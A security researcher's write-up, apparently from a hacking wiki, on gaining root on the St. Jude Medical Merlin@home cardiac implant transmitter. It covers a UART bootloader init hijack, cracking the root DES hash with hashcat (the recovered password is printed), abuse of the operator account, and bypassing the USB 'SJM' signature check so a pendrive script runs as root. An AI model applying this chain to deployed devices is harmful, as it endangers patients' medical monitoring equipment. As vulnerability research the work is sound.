SJM Merlin at Home
"Although the information we release has been verified and shown to work to the best our knowledge, we cant be held accountable for bricked devices or roots gone wrong."
This page will be dedicated to a general overview, descriptions, and information related to the St. Jude Medical Merlin@home Transmitter Model EX1150.
About
The Merlin@home Transmitter is intended to pair with an Implantable Cardiac Defibrillator (ICD) or Pacemaker and upload the data to the Merlin.net patient care network for review by a physician.
Disassembly
UART
A Login Console is presented on UART (3.3v) at 115200 baud. The pinout for UART can be found below.
Exploitation
This device boots with the BLOB bootloader (https://sourceforge.net/projects/blob/) to a version of Montavista Linux (https://en.wikipedia.org/wiki/MontaVista) with a restricted root login. It is possible to init hijack by interrupting the bootloader.
Post device verification... Serial2In string: ATi0 Serial2In string: 56000 Modem Post : Passed with retries = 0 Time taken by POST : [1.197000] seconds nand_init: manuf=0x000000EC device=0x000000F1 scanning for bad blocks... nand_check_blocks: nand_read_page() failed, addr=0x02B40000 nand_check_blocks: nand_read_page() failed, addr=0x04B20000 nand_check_blocks: nand_read_page() failed, addr=0x07660000 Consider yourself BLOBed! blob version 2.0.5-pre2 for Tanto Basic Device Copyright (C) 1999 2000 2001 Jan-Derk Bakker and Erik Mouw blob comes with ABSOLUTELY NO WARRANTY; read the GNU GPL for details. This is free software, and you are welcome to redistribute it under certain conditions; read the GNU GPL for details. blob release: d20081014_platform_4_16 Memory map: 0x02000000 @ 0xc0000000 (32 MB) ram_post executing... Data Bus Test Address Bus Test Data Qualifer Test Device Test c0200000status_next, board type = RF board revision = (3) c1e00000r14_svc = 0x0000034d Autoboot in progress, press any key to stop .. Autoboot aborted Type "help" to get a list of commands blob> boot console=ttyMX0,115200n8 root=/dev/mtdblock6 ip=dhcp init=/bin/sh BOARD_REVISION=
We can pull some useful information from the device.
sh-2.05a# cat /etc/passwd root:0q8h1Maw1oYAU:0:0:root:/root:/bin/bash bin:*:1:1:bin:/bin: daemon:*:2:2:daemon:/usr/sbin: sys:*:3:3:sys:/dev: adm:*:4:4:adm:/var/adm: lp:*:5:7:lp:/var/spool/lpd: sync:*:6:8:sync:/bin:/bin/sync shutdown:*:7:9:shutdown:/sbin:/sbin/shutdown halt:*:8:10:halt:/sbin:/sbin/halt mail:*:9:11:mail:/var/spool/mail: news:*:10:12:news:/var/spool/news: uucp:*:11:13:uucp:/var/spool/uucp: operator:*:12:0:operator:/root: games:*:13:100:games:/usr/games: ftp:*:15:14:ftp:/var/ftp: man:*:16:100:man:/var/cache/man: www:*:17:100:www:/var/www: sshd:*:18:100:sshd:/var/run/sshd: nobody:*:65534:65534:nobody:/home:/bin/sh sh-2.05a# cat /etc/shadow cat: /etc/shadow: No such file or directory
Lets break this.
E:\hashcat-3.5.0>hashcat64.exe --session sjm_hash -w 3 -m 1500 e:\sjm_hash -a 3 ?a?a?a?a?a?a?a hashcat (v3.5.0) starting... * Device #1: WARNING! Kernel exec timeout is not disabled. This may cause "CL_OUT_OF_RESOURCES" or related errors. To disable the timeout, see: https://hashcat.net/q/timeoutpatch OpenCL Platform #1: NVIDIA Corporation ====================================== * Device #1: GeForce GTX 980, 1024/4096 MB allocatable, 16MCU OpenCL Platform #2: Intel(R) Corporation ======================================== * Device #2: Intel(R) Core(TM) i5-4570 CPU @ 3.20GHz, skipped. Hashes: 1 digests; 1 unique digests, 1 unique salts Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates Applicable optimizers: * Zero-Byte * Precompute-Final-Permutation * Not-Iterated * Single-Hash * Single-Salt * Brute-Force Watchdog: Temperature abort trigger set to 90c Watchdog: Temperature retain trigger set to 75c [s]tatus [p]ause [r]esume [b]ypass [c]heckpoint [q]uit => 0q8h1Maw1oYAU:mah1200 Session..........: sjm_hash Status...........: Cracked Hash.Type........: descrypt, DES (Unix), Traditional DES Hash.Target......: 0q8h1Maw1oYAU Time.Started.....: Sun May 07 17:39:55 2017 (9 secs) Time.Estimated...: Sun May 07 17:40:04 2017 (0 secs) Guess.Mask.......: ?a?a?a?a?a?a?a [7] Guess.Queue......: 1/1 (100.00%) Speed.Dev.#1.....: 544.7 MH/s (60.44ms) Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts Progress.........: 4764729344/69833729609375 (0.01%) Rejected.........: 0/4764729344 (0.00%) Restore.Point....: 0/81450625 (0.00%) Candidates.#1....: ;~9anan -> $sb~{ka HWMon.Dev.#1.....: Temp: 67c Fan: 33% Util: 99% Core:1404MHz Mem:3004MHz Bus:16 Started: Sun May 07 17:39:51 2017 Stopped: Sun May 07 17:40:05 2017
Attempts to login as root fail, what was going on with that operator user?
operator:*:12:0:operator:/root:
Lets set the password to "test" and attempt logging in.
sh-2.05a# grep "operator" /etc/passwd operator:dPUvQFLH8...A:12:0:operator:/root:
[SJM_CONFIGURATION] VERSION=EX2000 v6.1B PR_6.56 (none) login: root Password: Login incorrect 2017-05-14 (none) login: operator Password: operator@(none):~$ whoami operator operator@(none):~$ su root Password: PAM_unix[266]: (su) session opened for user root by (uid=12) root@(none):~# whoami root root@(none):~#
Taking Things Further
Lets look at some of these custom hotplug scripts. /etc/hotplug/usb/sjmusb looks like a good start.
#!/bin/bash # # Script to mount valid sjm pendrive(s) via hotplug. Hotplug will invoke # this script only if the attached USB device is a mass-storage device. # hotplug does this by looking at the device class of the attached usb device # See /etc/hotplug/usb.usermap. The device class for mass storage devices # is ______ # # In a nutshell, the script looks in /proc/scsi/usb-storage* directory to # find the scsi ID of the attached USB storage device. It then goes on to # find the device node corresponding to this scsi ID. # # version 1.1 - Added USB signature check functionality # # For the new cellular adapters - viz mobidata and velocity, ignore the # mass storage interface reported. Please see comments at the top of # /etc/hotplug/usb/velocity for details. # # - Ashok Iyer (16-Jun-2010) # export PATH=/usr/bin:/usr/local/bin:$PATH MOUNT_PATH="/mnt/sjmpendrives" MOUNT_NUMBER=1 LOG_FILE="/tmp/usbstorage.log" SGMAP="sg_map" # The functions in this script rely on "echo" to pass information to each # other. If you need to modify this script, do not use "echo" for debugging. # Instead use the feedback()/error_exit() functions below. These will log # information to a log file and do not interfere with information passing # between functions. ***snip*** function check_sign { local node1=$1"1" feedback "Checking signature ... " feedback "node1 = $node1" dd if=$node1 of=/tmp/.sign bs=1 count=3 skip=501 signature=`cat /tmp/.sign` if [ "$signature" = "SJM" ]; then feedback "Valid pendrive" echo 0 else feedback "Invalid pendrive" echo -1 fi } ***snip*** # We only mount the first partition of a USB storage device. There is no # requirement to mount multiple partitions. Makes the job easy :-) function mount_scsi_dev { local scsi_dev=$1 local mountpt="" # check if the first partition of the device is mounted if ! mount | egrep -q "^$scsi_dev"1"[[:space:]]" then mountpt=$(find_unused_mountpt) || error_exit "Failed to find a mount pt" mkdir -p "$mountpt" || error_exit "Failed to create mount pt $mountpt" # FIXME- Ugly hack to detect partitions on USB flash drive # Possible bug in Kernel and/or devfs. Either use devfs=nomount kernel cmdline # or fix devfs once and for all. # There is another problem in devfs that after the USB flash disk is removed # the corresponding devfs partitions (part1, part2 etc...) still show up. foobar=`ls -l $scsi_dev | awk '{print $11}'` dd if=/dev/$foobar of=/dev/null bs=1 count=1 # Checking USB signature ret=`check_sign $scsi_dev` if [ $ret -eq 0 ]; then feedback "Valid pendrive" else # Tanto: Inform the Exec App to show # an Invalid Media Error if [ -p /tmp/remoteInt.pipe ]; then echo "UsbHotplug InvalidMedia" > /tmp/remoteInt.pipe error_exit "Invalid pendrive" else echo "ERROR: /tmp/remoteInt.pipe does not exist!!!" fi fi feedback "Mounting $scsi_dev"1" on $mountpt" mount -t auto $scsi_dev"1" $mountpt if [ "$?" -eq 0 ]; then feedback "$scsi_dev"1" is now mounted on $mountpt" feedback "Launch application specific script" sh /etc/launch_appln.sh $mountpt else feedback "Mount error for $scsi_dev" fi else feedback "Ignoring $scsi_dev - already mounted" fi } # Find and mount all attached USB storage devices function mount_all_attached { local scsiuniqid="" feedback "Find and mount all attached usb storage devices" for scsiuniqid in $(allusb_scsiuniqid) do local scsidev="`diskdev_from_uniqid $scsiuniqid`" if [ "$scsidev" == "UNKNOWN" ]; then sleep 1 fi mount_scsi_dev $scsidev done } ***snip*** # The remover script will be invoked when the device is removed. This is # useless in a way because umount will have no effect. The only benefit is # that the "mount" command will not show stale entries. # FIXME - Need to add specialized LOGIC to selectively umount USB flash drive # which is removed ( unlike umounting all attached USB flash drives ) feedback "REM = $REMOVER" if [ -f $REMOVER ]; then echo '/bin/umount /mnt/sjmpendrives/*' >> $REMOVER else echo -e '#!/bin/sh\n/bin/umount /mnt/sjmpendrives/*' > $REMOVER fi # Inform the Export data script when pendrive is unplugged. echo -e '\nps -A | grep export_data \nif [ $? -eq 0 ]; then \n\tif [ -p /tmp/usbDataExport.pipe ]; then \n\t\t echo "Hotplug umount" > /tmp/usbDataExport.pipe \n\tfi\nfi' >> $REMOVER chmod a+x $REMOVER mount_all_attached
Lets look inside of /etc/launch_appln.sh
#!/bin/sh if [ $# -ne 1 ]; then echo "usage: ./launch_appln.sh /mnt/pendrive" exit fi # FIXME # This script may be invoked by hotplug # Do not run the script if it is already running # updater or data export mountpt=$1 script_path=/apps/tanto/ if [ -f $mountpt/version.ini ]; then # call updater script echo "Launching updater script" if [ -f $mountpt/etc/init.d/upgrade_script.sh ]; then sh $mountpt/etc/init.d/upgrade_script.sh $mountpt > /tmp/debugUpdater.txt 2>&1 umount /mnt/sjmpendrives/1 umount /mnt/pendrive else umount /mnt/sjmpendrives/1 umount /mnt/pendrive exit 0 fi else # Call Data export script echo "Launching export data script" sh $script_path/export_data.sh $mountpt umount /mnt/sjmpendrives/1 umount /mnt/pendrive fi
It looks like their pendrive "signature" is fairly easy to get around.
rjmendez@Reggie:~/stjude_merlin$ sudo dd if=/dev/sdb1 of=/tmp/.sign bs=1 count=3 skip=501 3+0 records in 3+0 records out 3 bytes copied, 0.00116472 s, 2.6 kB/s rjmendez@Reggie:~/stjude_merlin$ hd /tmp/.sign 00000000 00 00 00 |...| 00000003 rjmendez@Reggie:~/stjude_merlin$ hd .sign_mod 00000000 53 4a 4d |SJM| 00000003 rjmendez@Reggie:~/stjude_merlin$ sudo dd if=.sign_mod bs=1 count=3 of=/dev/sdb1 bs=1 seek=501 3+0 records in 3+0 records out 3 bytes copied, 0.00700994 s, 0.4 kB/s rjmendez@Reggie:~/stjude_merlin$ sudo dd if=/dev/sdb1 of=/tmp/.sign bs=1 count=3 skip=501 3+0 records in 3+0 records out 3 bytes copied, 0.00123249 s, 2.4 kB/s rjmendez@Reggie:~/stjude_merlin$ hd /tmp/.sign 00000000 53 4a 4d |SJM| 00000003
Adding the required files to the drive and a small script.
rjmendez@Reggie:/media/rjmendez/7A3B-B3C6$ ls -lahR .: total 36K drwxr-xr-x 3 rjmendez rjmendez 8.0K May 14 11:04 . drwxr-x---+ 8 root root 4.0K May 14 11:02 .. drwxr-xr-x 3 rjmendez rjmendez 8.0K May 13 14:02 etc -rw-r--r-- 1 rjmendez rjmendez 620 May 14 06:01 passwd -rw-r--r-- 1 rjmendez rjmendez 4 May 10 17:07 version.ini ./etc: total 24K drwxr-xr-x 3 rjmendez rjmendez 8.0K May 13 14:02 . drwxr-xr-x 3 rjmendez rjmendez 8.0K May 14 11:04 .. drwxr-xr-x 2 rjmendez rjmendez 8.0K May 13 14:02 init.d ./etc/init.d: total 24K drwxr-xr-x 2 rjmendez rjmendez 8.0K May 13 14:02 . drwxr-xr-x 3 rjmendez rjmendez 8.0K May 13 14:02 .. -rw-r--r-- 1 rjmendez rjmendez 771 May 13 18:27 upgrade_script.sh rjmendez@Reggie:/media/rjmendez/7A3B-B3C6$ cat etc/init.d/upgrade_script.sh #!/bin/sh function led_off { for i in `seq 0 7`; do ledControl -l$i -b0 sleep 0.05 done } function led_dim { for i in `seq 0 7`; do ledControl -l$i -b1 sleep 0.05 done } function led_bright { for i in `seq 0 7`; do ledControl -l$i -b2 sleep 0.05 done } function party_mode { counter=0 while [ $counter -lt $1 ]; do led_off sleep 0.05 led_dim sleep 0.05 led_bright sleep 0.05 let counter=counter+1 done } /etc/init.d/tantoapp stop #cp /mnt/sjmpendrives/1/passwd /etc/passwd echo "This worked!" > /root/diditwork.txt if [ -f /root/diditwork.txt ]; then party_mode 15 else echo "It did not work..." fi
This is the output that we get from the console.
operator@(none):~$ su root Password: PAM_unix[265]: (su) session opened for user root by (uid=12) root@(none):~# hub.c: new USB device usb-mx2hci-2, assigned address 2 scsi0 : SCSI emulation for USB Mass Storage devices Vendor: Lexar Model: USB Flash Drive Rev: 1100 Type: Direct-Access ANSI SCSI revision: 02 Attached scsi removable disk sda at scsi0, channel 0, id 0, lun 0 SCSI device sda: 31285248 512-byte hdwr sectors (16018 MB) sda: Write Protect is off Partition check: /dev/scsi/host0/bus0/target0/lun0: p1 modprobe: Can't locate module /dev/sg1 modprobe: Can't locate module /dev/sg2 modprobe: Can't locate module /dev/sg3 modprobe: Can't locate module /dev/sg4 modprobe: Can't locate module /dev/sg5 modprobe: Can't locate module /dev/sdb modprobe: Can't locate module /dev/sdc modprobe: Can't locate module /dev/sdd modprobe: Can't locate module /dev/sde modprobe: Can't locate module /dev/sdf modprobe: modprobe: Can't locate module nls_cp437 modprobe: modprobe: Can't locate module nls_iso8859-1 modprobe: modprobe: Can't locate module nls_iso8859-1 modprobe: modprobe: Can't locate module nls_iso8859-1 ls /root devel_install.sh diditwork.txt setdev.sh setlog.sh root@(none):~# cat /root/diditwork.txt This worked! root@(none):~# cat /tmp/usbstorage.log +++ Starting USB (un)mounter script for device /proc/bus/usb/001/002 REM = /var/run/usb/%proc%bus%usb%001%002 Find and mount all attached usb storage devices usb proc-fs yields SCSI host number=0 - suffix with zeroes (kernel 2.4) Use sgmap to match 0:0:0:0. Waiting for device id to appear... SCSI disk for 0:0:0:0 is /dev/sda Checking /mnt/sjmpendrives/1 Mountpoint /mnt/sjmpendrives/1 is free Checking signature ... node1 = /dev/sda1 Valid pendrive Valid pendrive Mounting /dev/sda1 on /mnt/sjmpendrives/1 /dev/sda1 is now mounted on /mnt/sjmpendrives/1 Launch application specific script